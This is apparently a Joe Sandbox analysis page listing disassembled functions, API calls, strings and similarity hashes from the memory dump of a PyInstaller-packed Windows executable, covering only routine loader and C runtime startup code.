Function 00007FF690017C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF690013834), ref: 00007FF690017CE4
CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF690013834), ref: 00007FF690017D2C

Part of subcall function 00007FF690017E10: GetEnvironmentVariableW.KERNEL32(00007FF69001365F), ref: 00007FF690017E47
Part of subcall function 00007FF690017E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF690017E69

Part of subcall function 00007FF690027548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690027561

Part of subcall function 00007FF6900126C0: MessageBoxW.USER32 ref: 00007FF690012736

Strings

TMP, xrefs: 00007FF690017CA2
LOADER: failed to set the TMP environment variable., xrefs: 00007FF690017CBC
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF690017D5E
_MEI%d, xrefs: 00007FF690017CF2
TMP, xrefs: 00007FF690017C7C, 00007FF690017D83

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction ID: 582e2f5395253aec387d1e83e57f5de326240f7cfe8f1735a6deca2948ca138d
Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction Fuzzy Hash: 9141A511B09A4660FAB1EB75A9556F92361EF897C8F8000B1EE1DC77DEEE3CE5818340

Function 00007FF69002AD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002B199

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
Instruction ID: e005b9805fc87ec86fd2092fc43cee55ef3e6e0f752feecedb6fa5bcf92668ee
Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
Instruction Fuzzy Hash: 56C1C122A0C787A2EB719B3994502BE3792FF91B80F5541B1EA5D83799DE7CE856C300

Function 00007FF690017B50 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF690017B70
OpenProcessToken.ADVAPI32 ref: 00007FF690017B83
GetTokenInformation.KERNELBASE ref: 00007FF690017BA8
GetLastError.KERNEL32 ref: 00007FF690017BB2
GetTokenInformation.KERNELBASE ref: 00007FF690017BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF690017C0E
CloseHandle.KERNEL32 ref: 00007FF690017C26

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction ID: caaba141d6650ae7dd261c3e276eb61553160e369f13a72dacd188c2a5324921
Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction Fuzzy Hash: 5D217631A0CA4291EB709B75E48463AA3A1FFC57A8F500275EA6D83BDDDF7CD4858740

Function 00007FF6900133E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF690013534), ref: 00007FF690013411

Part of subcall function 00007FF6900129E0: GetLastError.KERNEL32(?,?,?,00007FF69001342E,?,00007FF690013534), ref: 00007FF690012A14
Part of subcall function 00007FF6900129E0: FormatMessageW.KERNEL32(?,?,?,00007FF69001342E), ref: 00007FF690012A7D
Part of subcall function 00007FF6900129E0: MessageBoxW.USER32 ref: 00007FF690012ACF

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF6900134B8
Failed to obtain executable path., xrefs: 00007FF69001341B
\\?\, xrefs: 00007FF690013482
GetModuleFileNameW, xrefs: 00007FF690013422
Failed to resolve full path to executable %ls., xrefs: 00007FF690013461

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: f7e988efd3d34d4d1c3567dfdcaba566f27d1ad52ae0487ec60254b3518fd80e
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: DE218121B0C542B1FAB19B34E8417BA2251FF49388F8001B2D69DC77DEEF2CE5048700

Function 00007FF690018400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF690017B50: GetCurrentProcess.KERNEL32 ref: 00007FF690017B70
Part of subcall function 00007FF690017B50: OpenProcessToken.ADVAPI32 ref: 00007FF690017B83
Part of subcall function 00007FF690017B50: GetTokenInformation.KERNELBASE ref: 00007FF690017BA8
Part of subcall function 00007FF690017B50: GetLastError.KERNEL32 ref: 00007FF690017BB2
Part of subcall function 00007FF690017B50: GetTokenInformation.KERNELBASE ref: 00007FF690017BF2
Part of subcall function 00007FF690017B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF690017C0E
Part of subcall function 00007FF690017B50: CloseHandle.KERNEL32 ref: 00007FF690017C26

LocalFree.KERNEL32(?,00007FF690013814), ref: 00007FF69001848C
LocalFree.KERNEL32(?,00007FF690013814), ref: 00007FF690018495

Strings

D:(A;;FA;;;%s), xrefs: 00007FF690018477
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF690018462
S-1-3-4, xrefs: 00007FF690018441
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6900184A3

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
Instruction ID: 9a7e1bc105953e1ca9a115c05ddec901fe9a170597832da6fcbccac4a3004707
Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
Instruction Fuzzy Hash: D3216231A08742A2F660AB30E4557E973A1FF88784F8444B6EA4DC379ADF3CE545C740

Function 00007FF69002C270 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69002C25B), ref: 00007FF69002C38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69002C25B), ref: 00007FF69002C417

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction ID: 0219f2ecabbdaf2371d1ac489016fb3e55e351a4e53d8cb56e150af9cfcb5535
Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction Fuzzy Hash: 2691B472E08651A5F770DF799450ABD2BA1FB44B88F544179DE0EA6B8DDF38E482C700

Function 00007FF690024938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF690024965
CreateFileW.KERNELBASE ref: 00007FF6900249A4
CloseHandle.KERNEL32 ref: 00007FF6900249D9

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction ID: 5952a005980c72c4a21ec1451ba1c3bac91e2bfcf69d06d4c8f20f9078bd3e6a
Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction Fuzzy Hash: F6418E22E1878293E7648B7495103696260FFA47A4F109375EB9C83BDDEF7CE5E28700

Function 00007FF69001BF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69001C12C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF69001C140

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF69001BF80
__scrt_release_startup_lock.LIBCMT ref: 00007FF69001BFEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF69001C041

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction ID: afe7b2b988735ebbddd38d3ccec8b90aff9a20e253ad8cfb1447db602f92aaf3
Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
Instruction Fuzzy Hash: 9C315E25E0D643A2FAB5A7789492BB91381EF4938CF4440B8EA0DC73DFDE2CE8458205

Function 00007FF690028D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF690028D44), ref: 00007FF690028D59
TerminateProcess.KERNEL32(?,?,?,00007FF690028D44), ref: 00007FF690028D64
ExitProcess.KERNEL32 ref: 00007FF690028D73

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction ID: d569a1b56b959919e4391b4fe92eda8a593df69a1d37d3985b962fd582458feb
Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
Instruction Fuzzy Hash: 17D05E18F19606A3FB382B705C5A5790352DF9C704F0018B8E94F863DBCD2CE80E4300

Function 00007FF69001F45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69001F4A0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF69001F597

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction ID: af25e8a45fb27d1b27e653e50c6fae9c672740ecd08210c6cc40224cfedb9dac
Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
Instruction Fuzzy Hash: A7517461B0968266E7B89E3A940067A6691FF84BBCF144774DE6D877DDCF3CF4418600

Function 00007FF69002B444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF69002B5DD), ref: 00007FF69002B490
GetLastError.KERNEL32(?,?,?,?,?,00007FF69002B5DD), ref: 00007FF69002B49A

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction ID: eac446635ce7575b9d37d0f62653966e237ec8f5716fa4cd681da9f2521c5fe8
Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
Instruction Fuzzy Hash: 6111C161A08A8191DA209B39A844169A362FB44BF4F540371EEBD877EECF3CD1518700

Function 00007FF690029C58 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction ID: f4b8aa3f526a686db3a63d4e4968795ef82b230a5e4a09a1849436b8aedd9eea
Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
Instruction Fuzzy Hash: CFE08C50F0864262FF39ABF6A8440792292EF98701F0040B0DE0DC735DEE2CE9468300

Function 00007FF690029E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF690029CE5,?,?,00000000,00007FF690029D9A), ref: 00007FF690029ED6
GetLastError.KERNEL32(?,?,?,00007FF690029CE5,?,?,00000000,00007FF690029D9A), ref: 00007FF690029EE0

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction ID: 3030356d8aea27503f28b97687b9d8cdd9900df51c58f47a08bc158583813bd2
Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
Instruction Fuzzy Hash: F1218421F1C64261EEB49779A95037D12D2EF847A4F0552B5DA2EC77DACE6CE482C301

Function 00007FF69002B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002B1E4

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction ID: 7eb7d49f67f8f43a6f4a43045c99bf4c855238541891f3583fbc4642f29adac5
Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
Instruction Fuzzy Hash: 4641BC32918242A7EA34DA3DA55127D73A2FB96B80F140171DA8EC3798CF3CE503C751

Function 00007FF6900176A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF69001774A

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 23984c9b0e92b3499d0e452eca00665f4f26c6b08eca85ad94915f629dbeb913
Instruction ID: 2cde29e0d7c62d59738e9bba067541559e27a564004f52a75a2aa519c8185c2d
Opcode Fuzzy Hash: 23984c9b0e92b3499d0e452eca00665f4f26c6b08eca85ad94915f629dbeb913
Instruction Fuzzy Hash: 62218621B0C65165FA759B36A9047BAA651FF45BD8F8C44B0DE0D877CADE7DE081C700

Function 00007FF69002AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002ACD2

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction ID: 51178b44efaede3e4e49037e6a1a880cd6dd35f58b245a36aa54042dd8a9664c
Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
Instruction Fuzzy Hash: FB31AD22E18642A7F725AB3D98413BD2650FF51BA4F5101B5EA2D837DACFBCE442C321

Function 00007FF690028C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF690028CA7

Part of subcall function 00007FF690028DA0: GetModuleHandleExW.KERNEL32 ref: 00007FF690028DC5
Part of subcall function 00007FF690028DA0: GetProcAddress.KERNEL32 ref: 00007FF690028DDB
Part of subcall function 00007FF690028DA0: FreeLibrary.KERNEL32 ref: 00007FF690028E02

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

